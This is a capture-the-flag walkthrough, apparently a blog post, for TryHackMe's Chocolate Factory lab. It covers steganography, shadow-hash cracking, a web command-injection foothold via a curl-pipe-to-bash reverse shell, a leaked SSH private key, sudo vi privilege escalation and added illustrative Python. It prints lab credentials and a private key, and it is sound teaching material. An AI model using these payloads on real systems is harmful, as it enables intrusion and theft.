In this walkthrough we will go through the Chocolate Factory room on TryHackMe. It is rated Easy and covers basic service exploitation, steganography, bypassing input validation (a web form that hands user input to a shell) and some Linux privilege escalation. Overall it was a fun room to work through, so let's get started.
Machine Info:

| Field | Value |
| --- | --- |
| Title | ChocolateFactory |
| IP address | 10.10.96.23 |
| Difficulty | Easy |
| Objective | This room was designed so that hackers can revisit Willy Wonka's Chocolate Factory and meet the Oompa Loompas |
Phase 1 – Enumeration
- Checking if machine is live or not.
- Let us start with an nmap half-open (SYN) scan with service version detection. It takes a few minutes, and the results that matter are three open ports: 21 (FTP), 22 (SSH) and 80 (HTTP). nmap also reports 53/tcp as filtered and a handful of low ports (100 to 125) as open but with no identifiable service (note the `?` after each service name); none of those plays a part in this room.
```
wh1terose@fsociety:~$ sudo nmap -sS -sV 10.10.96.23
Nmap scan report for 10.10.96.23
Host is up (0.24s latency).
Not shown: 988 closed ports
PORT    STATE    SERVICE    VERSION
21/tcp  open     ftp        vsftpd 3.0.3
22/tcp  open     ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
53/tcp  filtered domain
80/tcp  open     http       Apache httpd 2.4.29 ((Ubuntu))
100/tcp open     newacct?
106/tcp open     pop3pw?
109/tcp open     pop2?
110/tcp open     pop3?
111/tcp open     rpcbind?
113/tcp open     ident?
119/tcp open     nntp?
125/tcp open     locus-map?
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 184.65 seconds
```
- Next I tried an anonymous login to the FTP server on port 21. Anonymous login is allowed, and the only file on the server is an image named gum_room.jpg, which I downloaded for further analysis.
```
wh1terose@fsociety:~$ ftp 10.10.96.23
Connected to 10.10.96.23.
220 (vsFTPd 3.0.3)
Name (10.10.96.23:wh1terose): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1000       208838 Sep 30  2020 gum_room.jpg
226 Directory send OK.
ftp> get gum_room.jpg
local: gum_room.jpg remote: gum_room.jpg
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for gum_room.jpg (208838 bytes).
226 Transfer complete.
208838 bytes received in 0.84 secs (243.8747 kB/s)
ftp> exit
221 Goodbye.
```
- The image has data hidden inside it. steghide extracts an embedded text file (no passphrase was needed, just press Enter at the prompt), and the text file contains a base64-encoded string.
```
wh1terose@fsociety:~/CTF/TryHackme/Chocolate Factory$ steghide --extract -sf gum_room.jpg
Enter passphrase:
wrote extracted data to "b64.txt".
wh1terose@fsociety:~/CTF/TryHackme/Chocolate Factory$ ls
b64.txt  gum_room.jpg
wh1terose@fsociety:~/CTF/TryHackme/Chocolate Factory$ cat b64.txt
ZGFlbW9uOio6MTgzODA6MDo5OTk5OTo3Ojo6CmJpbjoqOjE4MzgwOjA6OTk5OTk6Nzo6OgpzeXM6
KjoxODM4MDowOjk5OTk5Ojc6OjoKc3luYzoqOjE4MzgwOjA6OTk5OTk6Nzo6OgpnYW1lczoqOjE4
MzgwOjA6OTk5OTk6Nzo6OgptYW46KjoxODM4MDowOjk5OTk5Ojc6OjoKbHA6KjoxODM4MDowOjk5
OTk5Ojc6OjoKbWFpbDoqOjE4MzgwOjA6OTk5OTk6Nzo6OgpuZXdzOio6MTgzODA6MDo5OTk5OTo3
Ojo6CnV1Y3A6KjoxODM4MDowOjk5OTk5Ojc6OjoKcHJveHk6KjoxODM4MDowOjk5OTk5Ojc6OjoK
d3d3LWRhdGE6KjoxODM4MDowOjk5OTk5Ojc6OjoKYmFja3VwOio6MTgzODA6MDo5OTk5OTo3Ojo6
Cmxpc3Q6KjoxODM4MDowOjk5OTk5Ojc6OjoKaXJjOio6MTgzODA6MDo5OTk5OTo3Ojo6CmduYXRz
Oio6MTgzODA6MDo5OTk5OTo3Ojo6Cm5vYm9keToqOjE4MzgwOjA6OTk5OTk6Nzo6OgpzeXN0ZW1k
LXRpbWVzeW5jOio6MTgzODA6MDo5OTk5OTo3Ojo6CnN5c3RlbWQtbmV0d29yazoqOjE4MzgwOjA6
OTk5OTk6Nzo6OgpzeXN0ZW1kLXJlc29sdmU6KjoxODM4MDowOjk5OTk5Ojc6OjoKX2FwdDoqOjE4
MzgwOjA6OTk5OTk6Nzo6OgpteXNxbDohOjE4MzgyOjA6OTk5OTk6Nzo6Ogp0c3M6KjoxODM4Mjow
Ojk5OTk5Ojc6OjoKc2hlbGxpbmFib3g6KjoxODM4MjowOjk5OTk5Ojc6OjoKc3Ryb25nc3dhbjoq
OjE4MzgyOjA6OTk5OTk6Nzo6OgpudHA6KjoxODM4MjowOjk5OTk5Ojc6OjoKbWVzc2FnZWJ1czoq
OjE4MzgyOjA6OTk5OTk6Nzo6OgphcnB3YXRjaDohOjE4MzgyOjA6OTk5OTk6Nzo6OgpEZWJpYW4t
ZXhpbTohOjE4MzgyOjA6OTk5OTk6Nzo6Ogp1dWlkZDoqOjE4MzgyOjA6OTk5OTk6Nzo6OgpkZWJp
YW4tdG9yOio6MTgzODI6MDo5OTk5OTo3Ojo6CnJlZHNvY2tzOiE6MTgzODI6MDo5OTk5OTo3Ojo6
CmZyZWVyYWQ6KjoxODM4MjowOjk5OTk5Ojc6OjoKaW9kaW5lOio6MTgzODI6MDo5OTk5OTo3Ojo6
CnRjcGR1bXA6KjoxODM4MjowOjk5OTk5Ojc6OjoKbWlyZWRvOio6MTgzODI6MDo5OTk5OTo3Ojo6
CmRuc21hc3E6KjoxODM4MjowOjk5OTk5Ojc6OjoKcmVkaXM6KjoxODM4MjowOjk5OTk5Ojc6OjoK
dXNibXV4Oio6MTgzODI6MDo5OTk5OTo3Ojo6CnJ0a2l0Oio6MTgzODI6MDo5OTk5OTo3Ojo6CnNz
aGQ6KjoxODM4MjowOjk5OTk5Ojc6OjoKcG9zdGdyZXM6KjoxODM4MjowOjk5OTk5Ojc6OjoKYXZh
aGk6KjoxODM4MjowOjk5OTk5Ojc6OjoKc3R1bm5lbDQ6IToxODM4MjowOjk5OTk5Ojc6OjoKc3Ns
aDohOjE4MzgyOjA6OTk5OTk6Nzo6OgpubS1vcGVudnBuOio6MTgzODI6MDo5OTk5OTo3Ojo6Cm5t
LW9wZW5jb25uZWN0Oio6MTgzODI6MDo5OTk5OTo3Ojo6CnB1bHNlOio6MTgzODI6MDo5OTk5OTo3
Ojo6CnNhbmVkOio6MTgzODI6MDo5OTk5OTo3Ojo6CmluZXRzaW06KjoxODM4MjowOjk5OTk5Ojc6
OjoKY29sb3JkOio6MTgzODI6MDo5OTk5OTo3Ojo6CmkycHN2YzoqOjE4MzgyOjA6OTk5OTk6Nzo6
OgpkcmFkaXM6KjoxODM4MjowOjk5OTk5Ojc6OjoKYmVlZi14c3M6KjoxODM4MjowOjk5OTk5Ojc6
OjoKZ2VvY2x1ZToqOjE4MzgyOjA6OTk5OTk6Nzo6OgpsaWdodGRtOio6MTgzODI6MDo5OTk5OTo3
Ojo6CmtpbmctcGhpc2hlcjoqOjE4MzgyOjA6OTk5OTk6Nzo6OgpzeXN0ZW1kLWNvcmVkdW1wOiEh
OjE4Mzk2Ojo6Ojo6Cl9ycGM6KjoxODQ1MTowOjk5OTk5Ojc6OjoKc3RhdGQ6KjoxODQ1MTowOjk5
OTk5Ojc6OjoKX2d2bToqOjE4NDk2OjA6OTk5OTk6Nzo6OgpjaGFybGllOiQ2JENaSm5DUGVRV3A5
L2pwTngka2hHbEZkSUNKbnI4UjNKQy9qVFIycjdEcmJGTHA4enE4NDY5ZDNjMC56dUtONHNlNjFG
T2J3V0d4Y0hacU8yUkpIa2tMMWpqUFllZUd5SUpXRTgyWC86MTg1MzU6MDo5OTk5OTo3Ojo6Cg==
wh1terose@fsociety:~/CTF/TryHackme/Chocolate Factory$
```
- Decoding the string with CyberChef (or `base64 -d`) shows that it is a copy of an /etc/shadow file. Every entry except the last has `*` or `!` in the password field, meaning the account has no usable password; the last entry belongs to the user charlie and carries a real `$6$` (SHA-512 crypt) hash, which is the one we can attack. The long list of tool accounts (beef-xss, king-phisher, dradis, inetsim) looks like it was lifted from a Kali machine rather than from the Ubuntu target, so only charlie's line matters here.
```
daemon:*:18380:0:99999:7:::
bin:*:18380:0:99999:7:::
sys:*:18380:0:99999:7:::
sync:*:18380:0:99999:7:::
games:*:18380:0:99999:7:::
man:*:18380:0:99999:7:::
lp:*:18380:0:99999:7:::
mail:*:18380:0:99999:7:::
news:*:18380:0:99999:7:::
uucp:*:18380:0:99999:7:::
proxy:*:18380:0:99999:7:::
www-data:*:18380:0:99999:7:::
backup:*:18380:0:99999:7:::
list:*:18380:0:99999:7:::
irc:*:18380:0:99999:7:::
gnats:*:18380:0:99999:7:::
nobody:*:18380:0:99999:7:::
systemd-timesync:*:18380:0:99999:7:::
systemd-network:*:18380:0:99999:7:::
systemd-resolve:*:18380:0:99999:7:::
_apt:*:18380:0:99999:7:::
mysql:!:18382:0:99999:7:::
tss:*:18382:0:99999:7:::
shellinabox:*:18382:0:99999:7:::
strongswan:*:18382:0:99999:7:::
ntp:*:18382:0:99999:7:::
messagebus:*:18382:0:99999:7:::
arpwatch:!:18382:0:99999:7:::
Debian-exim:!:18382:0:99999:7:::
uuidd:*:18382:0:99999:7:::
debian-tor:*:18382:0:99999:7:::
redsocks:!:18382:0:99999:7:::
freerad:*:18382:0:99999:7:::
iodine:*:18382:0:99999:7:::
tcpdump:*:18382:0:99999:7:::
miredo:*:18382:0:99999:7:::
dnsmasq:*:18382:0:99999:7:::
redis:*:18382:0:99999:7:::
usbmux:*:18382:0:99999:7:::
rtkit:*:18382:0:99999:7:::
sshd:*:18382:0:99999:7:::
postgres:*:18382:0:99999:7:::
avahi:*:18382:0:99999:7:::
stunnel4:!:18382:0:99999:7:::
sslh:!:18382:0:99999:7:::
nm-openvpn:*:18382:0:99999:7:::
nm-openconnect:*:18382:0:99999:7:::
pulse:*:18382:0:99999:7:::
saned:*:18382:0:99999:7:::
inetsim:*:18382:0:99999:7:::
colord:*:18382:0:99999:7:::
i2psvc:*:18382:0:99999:7:::
dradis:*:18382:0:99999:7:::
beef-xss:*:18382:0:99999:7:::
geoclue:*:18382:0:99999:7:::
lightdm:*:18382:0:99999:7:::
king-phisher:*:18382:0:99999:7:::
systemd-coredump:!!:18396::::::
_rpc:*:18451:0:99999:7:::
statd:*:18451:0:99999:7:::
_gvm:*:18496:0:99999:7:::
charlie:$6$CZJnCPeQWp9/jpNx$khGlFdICJnr8R3JC/jTR2r7DrbFLp8zq8469d3c0.zuKN4se61FObwWGxcHZqO2RJHkkL1jjPYeeGyIJWE82X/:18535:0:99999:7:::
```
- I used hashes.com to crack charlie's hash. The same hash can be cracked offline with john or hashcat (mode 1800 for sha512crypt) and a common wordlist. Charlie's password is cn7824.
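As an added example that is not part of the original walkthrough, the script below does the same triage without CyberChef: it decodes base64 that was line-wrapped in a terminal paste, parses each shadow entry, separates locked accounts from crackable ones, turns the last-change day count into a date, and emits user:hash lines in the form john and hashcat --username accept. The inputs are constructed from entries shown above; the hashcat modes are the documented ones for each crypt(3) prefix.

```python
import base64
from datetime import date, timedelta

# Constructed sample: a base64-wrapped /etc/shadow fragment (first entry shown above),
# with the line breaks and stray spaces a copy-paste from a terminal produces.
B64_SAMPLE = "ZGFlbW9uOio6MTgz\nODA6MDo5OTk5OTo3 Ojo6Cg=="

# Constructed sample of decoded shadow lines, taken from the entries shown above.
SHADOW_SAMPLE = """\
daemon:*:18380:0:99999:7:::
mysql:!:18382:0:99999:7:::
systemd-coredump:!!:18396::::::
charlie:$6$CZJnCPeQWp9/jpNx$khGlFdICJnr8R3JC/jTR2r7DrbFLp8zq8469d3c0.zuKN4se61FObwWGxcHZqO2RJHkkL1jjPYeeGyIJWE82X/:18535:0:99999:7:::
"""

# crypt(3) prefix -> (algorithm name, hashcat -m mode); None where hashcat has no mode.
HASH_TYPES = {
    "$1$": ("md5crypt", 500),
    "$5$": ("sha256crypt", 7400),
    "$6$": ("sha512crypt", 1800),
    "$2b$": ("bcrypt", 3200),
    "$2y$": ("bcrypt", 3200),
    "$y$": ("yescrypt", None),
}


def decode_blob(blob: str) -> str:
    """Decode base64 that was line-wrapped or space-split when pasted."""
    cleaned = "".join(blob.split())
    return base64.b64decode(cleaned).decode()


def classify(hash_field: str) -> tuple:
    """Return (status, algorithm, hashcat_mode) for one shadow password field."""
    if hash_field == "":
        return ("empty", None, None)      # passwordless account: a finding on its own
    if hash_field[0] in "*!":
        return ("locked", None, None)     # '*', '!' and '!!' never match any password
    for prefix, (name, mode) in HASH_TYPES.items():
        if hash_field.startswith(prefix):
            return ("crackable", name, mode)
    return ("unknown", None, None)


def triage_shadow(text: str) -> list:
    """Parse shadow lines into dicts: who has a real hash, which algorithm, when it was set."""
    rows = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 3:
            continue
        user, pw, lastchg = fields[0], fields[1], fields[2]
        status, algo, mode = classify(pw)
        # Field 3 is days since 1970-01-01 of the last password change.
        changed = (date(1970, 1, 1) + timedelta(days=int(lastchg))).isoformat() if lastchg.isdigit() else None
        rows.append({"user": user, "status": status, "algorithm": algo,
                     "hashcat_mode": mode, "last_changed": changed, "hash": pw})
    return rows


def crackable_lines(rows: list) -> list:
    """user:hash lines for `john hashes.txt` or `hashcat -m 1800 --username hashes.txt`."""
    return [f"{r['user']}:{r['hash']}" for r in rows if r["status"] == "crackable"]


if __name__ == "__main__":
    print(decode_blob(B64_SAMPLE), end="")
    rows = triage_shadow(SHADOW_SAMPLE)
    for r in rows:
        print(f"{r['user']:<18} {r['status']:<10} {r['algorithm'] or '-':<12} "
              f"mode={r['hashcat_mode'] or '-':<5} changed={r['last_changed']}")
    print("\n".join(crackable_lines(rows)))
```

The last-change date of charlie's entry (18535 days, 2020-09-30) matches the timestamp on gum_room.jpg, a small consistency check that the file really came from the room's build.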
Phase 2 – Initial Access
- Now to the web front. The application on port 80 presents a login form expecting a username and password, and charlie's password from the previous step logs us in.
- Behind the login the portal offers a command field whose contents are executed by the underlying operating system; there is effectively no input validation, so anything typed runs as the web server user. I used it to fetch a bash reverse shell script hosted on my attacking machine (10.18.11.103, port 8000) with curl and pipe it straight into bash, with a netcat listener waiting on port 4444.
```
# Use this one-liner in the command field to get a reverse shell
curl http://10.18.11.103:8000/shell.sh | bash

# Listener on the attacking machine
nc -lvnp 4444
```
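The room does not show the server-side code behind the command field, so the following is an added illustration (not the room's code and not from the original post) of the pattern such a field behaves like, next to a hardened replacement. The allowlist, function names and the INJECTED marker are my own choices; the real fix is to not expose a shell to a web form at all, and the allowlist is what you do when the feature must stay.

```python
import shlex
import subprocess

# Hypothetical allowlist: the only diagnostics this portal is supposed to expose.
# Values are argv lists, so they are never interpreted by a shell.
ALLOWED = {"id": ["id"], "whoami": ["whoami"], "uptime": ["uptime"]}


def vulnerable_command_field(user_input: str) -> str:
    """The pattern a field like the room's behaves like: the text box goes to a shell.
    'id; curl http://attacker:8000/shell.sh | bash' runs exactly as typed."""
    result = subprocess.run(user_input, shell=True, capture_output=True, text=True)
    return result.stdout


def parse_allowlisted(user_input: str) -> list:
    """Accept exactly one bare allowlisted command name and return its argv.
    Anything else (extra words, ';', '|', '$(...)', unbalanced quotes) is rejected."""
    try:
        tokens = shlex.split(user_input)
    except ValueError as exc:                     # e.g. "No closing quotation"
        raise ValueError(f"rejected: {exc}") from None
    if len(tokens) != 1 or tokens[0] not in ALLOWED:
        raise ValueError(f"rejected: {user_input!r} is not an allowed command")
    return list(ALLOWED[tokens[0]])


def hardened_command_field(user_input: str) -> str:
    """Run only the mapped argv, without a shell, so metacharacters are inert."""
    argv = parse_allowlisted(user_input)
    result = subprocess.run(argv, shell=False, capture_output=True, text=True)
    return result.stdout


def is_rejected(user_input: str) -> bool:
    """Convenience wrapper: does the hardened parser refuse this input?"""
    try:
        parse_allowlisted(user_input)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "id; echo INJECTED"
    print("vulnerable output:", vulnerable_command_field(payload).strip())
    print("hardened rejects payload:", is_rejected(payload))
    print("hardened output:", hardened_command_field("id").strip())
```

Rejecting on token count rather than on a blocklist of characters is deliberate: blocklists are what "input validation bypassing" rooms are built around, while an allowlist of whole commands leaves nothing to bypass.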
- Browsing the file system from the www-data shell, I found an SSH key pair for charlie in /home/charlie (teleport and teleport.pub). The private key is mode 644, so any local user, including www-data, can read it; I copied it to my local machine.
```
www-data@chocolate-factory:/home/charlie$ ls -l
ls -l
total 12
-rw-r--r-- 1 charlie charley 1675 Oct  6  2020 teleport
-rw-r--r-- 1 charlie charley  407 Oct  6  2020 teleport.pub
-rw-r----- 1 charlie charley   39 Oct  6  2020 user.txt
www-data@chocolate-factory:/home/charlie$ cat teleport.pub
cat teleport.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDhp2s9zdSH3xFgOtnwJQEOBYsQ1TJsXrSUyT1hA4ENH6Cm5FbUDMvXYrfn8yLdXC2nQ1LCaVLuFrjL2y/aQ9e/yUU6YuLUVXaGqVA8vD+6ecQXBRsvgoGoF6YgN59XmnEyYKqqC4lciTOSUAhc1iF/EuvxwFL8cmiH/uqYuqsOhc2HBiMHfOCi/tFS2TXkm/XUPQi2zKvnim9iEJCB2iitTuXjYRklrIiiYcqifWOSh93X+hh84HCDPok6U0fWMUmjIhmDY6YSGdKNSW1n2ZLOZDK/czgA5FCjdl4tv7NudInJwQRFo5s+VvR1HLcqg3v2W352H6NKD90z9Nhh7kvj charlie@chocolate-factory
www-data@chocolate-factory:/home/charlie$ cat teleport
cat teleport
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA4adrPc3Uh98RYDrZ8CUBDgWLENUybF60lMk9YQOBDR+gpuRW
1AzL12K35/Mi3Vwtp0NSwmlS7ha4y9sv2kPXv8lFOmLi1FV2hqlQPLw/unnEFwUb
L4KBqBemIDefV5pxMmCqqguJXIkzklAIXNYhfxLr8cBS/HJoh/7qmLqrDoXNhwYj
B3zgov7RUtk15Jv11D0Itsyr54pvYhCQgdoorU7l42EZJayIomHKon1jkofd1/oY
fOBwgz6JOlNH1jFJoyIZg2OmEhnSjUltZ9mSzmQyv3M4AORQo3ZeLb+zbnSJycEE
RaObPlb0dRy3KoN79lt+dh+jSg/dM/TYYe5L4wIDAQABAoIBAD2TzjQDYyfgu4Ej
Di32Kx+Ea7qgMy5XebfQYquCpUjLhK+GSBt9knKoQb9OHgmCCgNG3+Klkzfdg3g9
zAUn1kxDxFx2d6ex2rJMqdSpGkrsx5HwlsaUOoWATpkkFJt3TcSNlITquQVDe4tF
w8JxvJpMs445CWxSXCwgaCxdZCiF33C0CtVw6zvOdF6MoOimVZf36UkXI2FmdZFl
kR7MGsagAwRn1moCvQ7lNpYcqDDNf6jKnx5Sk83R5bVAAjV6ktZ9uEN8NItM/ppZ
j4PM6/IIPw2jQ8WzUoi/JG7aXJnBE4bm53qo2B4oVu3PihZ7tKkLZq3Oclrrkbn2
EY0ndcECgYEA/29MMD3FEYcMCy+KQfEU2h9manqQmRMDDaBHkajq20KvGvnT1U/T
RcbPNBaQMoSj6YrVhvgy3xtEdEHHBJO5qnq8TsLaSovQZxDifaGTaLaWgswc0biF
uAKE2uKcpVCTSewbJyNewwTljhV9mMyn/piAtRlGXkzeyZ9/muZdtesCgYEA4idA
KuEj2FE7M+MM/+ZeiZvLjKSNbiYYUPuDcsoWYxQCp0q8HmtjyAQizKo6DlXIPCCQ
RZSvmU1T3nk9MoTgDjkNO1xxbF2N7ihnBkHjOffod+zkNQbvzIDa4Q2owpeHZL19
znQV98mrRaYDb5YsaEj0YoKfb8xhZJPyEb+v6+kCgYAZwE+vAVsvtCyrqARJN5PB
la7Oh0Kym+8P3Zu5fI0Iw8VBc/Q+KgkDnNJgzvGElkisD7oNHFKMmYQiMEtvE7GB
FVSMoCo/n67H5TTgM3zX7qhn0UoKfo7EiUR5iKUAKYpfxnTKUk+IW6ME2vfJgsBg
82DuYPjuItPHAdRselLyNwKBgH77Rv5Ml9HYGoPR0vTEpwRhI/N+WaMlZLXj4zTK
37MWAz9nqSTza31dRSTh1+NAq0OHjTpkeAx97L+YF5KMJToXMqTIDS+pgA3fRamv
ySQ9XJwpuSFFGdQb7co73ywT5QPdmgwYBlWxOKfMxVUcXybW/9FoQpmFipHsuBjb
Jq4xAoGBAIQnMPLpKqBk/ZV+HXmdJYSrf2MACWwL4pQO9bQUeta0rZA6iQwvLrkM
Qxg3lN2/1dnebKK5lEd2qFP1WLQUJqypo5TznXQ7tv0Uuw7o0cy5XNMFVwn/BqQm
G2QwOAGbsQHcI0P19XgHTOB7Dm69rP9j1wIRBOF7iGfwhWdi+vln
-----END RSA PRIVATE KEY-----
```
- Save the private key locally (here as id_rsa), restrict it to mode 600 (ssh refuses a key that other users can read) and use it to log in as charlie. The session starts in / rather than in charlie's home because, as the login message shows, the account's home directory is configured as the non-existent /home/charley; the user flag is in /home/charlie/user.txt.
```
wh1terose@fsociety:~/CTF/TryHackme/Chocolate Factory$ chmod 600 id_rsa
wh1terose@fsociety:~/CTF/TryHackme/Chocolate Factory$ ssh -i id_rsa charlie@10.10.96.23
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-115-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue May 30 17:38:36 UTC 2023

  System load:  0.08               Processes:           605
  Usage of /:   43.7% of 8.79GB    Users logged in:     0
  Memory usage: 63%                IP address for eth0: 10.10.96.23
  Swap usage:   0%

0 packages can be updated.
0 updates are security updates.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Wed Oct  7 16:10:44 2020 from 10.0.2.5
Could not chdir to home directory /home/charley: No such file or directory
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

charlie@chocolate-factory:/$
```
Phase 3 – Privilege Escalation
- For privilege escalation I first checked for sudo misconfigurations and found one: charlie may run /usr/bin/vi without a password. Read the runas specification carefully: in `(ALL : !root)` the first list is the target user and the second the target group, so the `!root` only forbids `-g root`, while a plain `sudo vi` still runs as the root user. vi can spawn a shell from inside the editor, and the GTFOBins one-liner gives a root shell directly.
```
charlie@chocolate-factory:/home/charlie$ sudo -l
Matching Defaults entries for charlie on chocolate-factory:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User charlie may run the following commands on chocolate-factory:
    (ALL : !root) NOPASSWD: /usr/bin/vi
charlie@chocolate-factory:/home/charlie$ sudo vi -c ':!/bin/sh' /dev/null
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
#
```
- The root flag is not sitting in a text file: /root/root.py holds it as a Fernet token and asks for the decryption key at runtime, so we still have to find that key.
```
# cd /root
# ls
root.py
# cat root.py
from cryptography.fernet import Fernet
import pyfiglet
key=input("Enter the key: ")
f=Fernet(key)
encrypted_mess= 'gAAAAABfdb52eejIlEaE9ttPY8ckMMfHTIw5lamAWMy8yEdGPhnm9_H_yQikhR-bPy09-NVQn8lF_PDXyTo-T7CpmrFfoVRWzlm0OffAsUM7KIO_xbIQkQojwf_unpPAAKyJQDHNvQaJ'
dcrypt_mess=f.decrypt(encrypted_mess)
mess=dcrypt_mess.decode()
display1=pyfiglet.figlet_format("You Are Now The Owner Of ")
display2=pyfiglet.figlet_format("Chocolate Factory ")
print(display1)
print(display2)
print(mess)
#
```
- To find the key I went back to my www-data shell and looked at the key_rev_key binary in the web root. Running strings on it prints the key in clear. Judging by the imported scanf and strcmp and the neighbouring strings, the program asks for a name and compares it with a hard-coded value before printing the key, but since the key itself is stored as a plain string in the binary, that check protects nothing.
```
www-data@chocolate-factory:/var/www/html$ strings key_rev_key
strings key_rev_key
/lib64/ld-linux-x86-64.so.2
libc.so.6
__isoc99_scanf
puts
__stack_chk_fail
printf
__cxa_finalize
strcmp
__libc_start_main
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
5j
%l
%j
%b
%Z
%R
%J
%b
=9
AWAVI
AUATL
[]A\A]A^A_
Enter your name:
laksdhfas
congratulations you have found the key:
b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
Keep its safe
Bad name!
;*3$"
GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7698
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
license.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
__stack_chk_fail@@GLIBC_2.4
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
strcmp@@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
__isoc99_scanf@@GLIBC_2.7
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment
www-data@chocolate-factory:/var/www/html$
```
- Finally, pass the key to root.py to get the root flag. Note that the key was typed with its Python b'...' wrapper exactly as strings printed it and still worked: on this Ubuntu 18.04 host `python` is Python 2, whose input() evaluates the typed text as an expression, so the quoted literal becomes the key (which also means any Python 2 input() call is an eval of user input). Under Python 3 you would type the bare base64 key.

b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='

```
# python root.py
Enter the key: b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
[pyfiglet banner: "You Are Now The Owner Of" / "Chocolate Factory"]
flag{cec59161d338fef787fcb4e296b42124}
#
```
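As an added example that is not part of the original walkthrough, the script below shows what root.py's Fernet.decrypt() actually checks, using only the standard library: a Fernet key is 32 bytes whose first half signs (HMAC-SHA256) and second half encrypts (AES-128-CBC), and a token is version 0x80, a big-endian timestamp, a 16-byte IV, the ciphertext and a 32-byte HMAC over everything before it. Verifying the HMAC with the key from key_rev_key tells you whether the key is right before you touch root.py, and parsing the token gives its creation time. The constants are the key and token as they appear above; build_token and flip_last_byte are my own helpers for producing known-good and tampered tokens (the AES step is omitted in them, so their ciphertext is arbitrary bytes).

```python
import base64
import hashlib
import hmac
import struct
import time

# Values as they appear in this walkthrough: key from key_rev_key, token from root.py.
KEY_B64 = "-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY="
TOKEN = ("gAAAAABfdb52eejIlEaE9ttPY8ckMMfHTIw5lamAWMy8yEdGPhnm9_H_yQikhR-bPy09-NVQn8lF_PDXyTo"
         "-T7CpmrFfoVRWzlm0OffAsUM7KIO_xbIQkQojwf_unpPAAKyJQDHNvQaJ")
# Constructed second key (32 bytes of 0x01) used to show a wrong key failing.
OTHER_KEY_B64 = base64.urlsafe_b64encode(b"\x01" * 32).decode()


def split_key(key_b64: str) -> tuple:
    """A Fernet key is 32 bytes: first 16 sign (HMAC-SHA256), last 16 encrypt (AES-128-CBC)."""
    raw = base64.urlsafe_b64decode(key_b64)
    if len(raw) != 32:
        raise ValueError("Fernet key must decode to 32 bytes")
    return raw[:16], raw[16:]


def parse_token(token: str) -> dict:
    """Split a token into its fields; no key is needed for this."""
    raw = base64.urlsafe_b64decode(token)
    if len(raw) < 1 + 8 + 16 + 32 or raw[0] != 0x80:
        raise ValueError("not a Fernet token")
    (ts,) = struct.unpack(">Q", raw[1:9])
    return {"version": raw[0], "timestamp": ts, "iv": raw[9:25],
            "ciphertext": raw[25:-32], "tag": raw[-32:], "signed": raw[:-32]}


def key_authenticates(key_b64: str, token: str) -> bool:
    """True iff HMAC-SHA256 under the signing half of the key matches the token's tag.
    This is the check Fernet.decrypt() performs before it decrypts anything."""
    signing_key, _ = split_key(key_b64)
    fields = parse_token(token)
    expected = hmac.new(signing_key, fields["signed"], hashlib.sha256).digest()
    return hmac.compare_digest(expected, fields["tag"])


def build_token(key_b64: str, ciphertext: bytes, iv: bytes, ts: int) -> str:
    """Assemble a token the way Fernet does, with the ciphertext supplied as-is."""
    signing_key, _ = split_key(key_b64)
    body = b"\x80" + struct.pack(">Q", ts) + iv + ciphertext
    tag = hmac.new(signing_key, body, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(body + tag).decode()


def flip_last_byte(token: str) -> str:
    """Corrupt the final byte of the tag, to show verification failing on tampering."""
    raw = bytearray(base64.urlsafe_b64decode(token))
    raw[-1] ^= 0x01
    return base64.urlsafe_b64encode(bytes(raw)).decode()


if __name__ == "__main__":
    f = parse_token(TOKEN)
    print("token created:", time.strftime("%Y-%m-%d %H:%M:%S UTC", time.gmtime(f["timestamp"])))
    print("ciphertext bytes:", len(f["ciphertext"]))
    print("key from key_rev_key authenticates root.py's token:", key_authenticates(KEY_B64, TOKEN))
```

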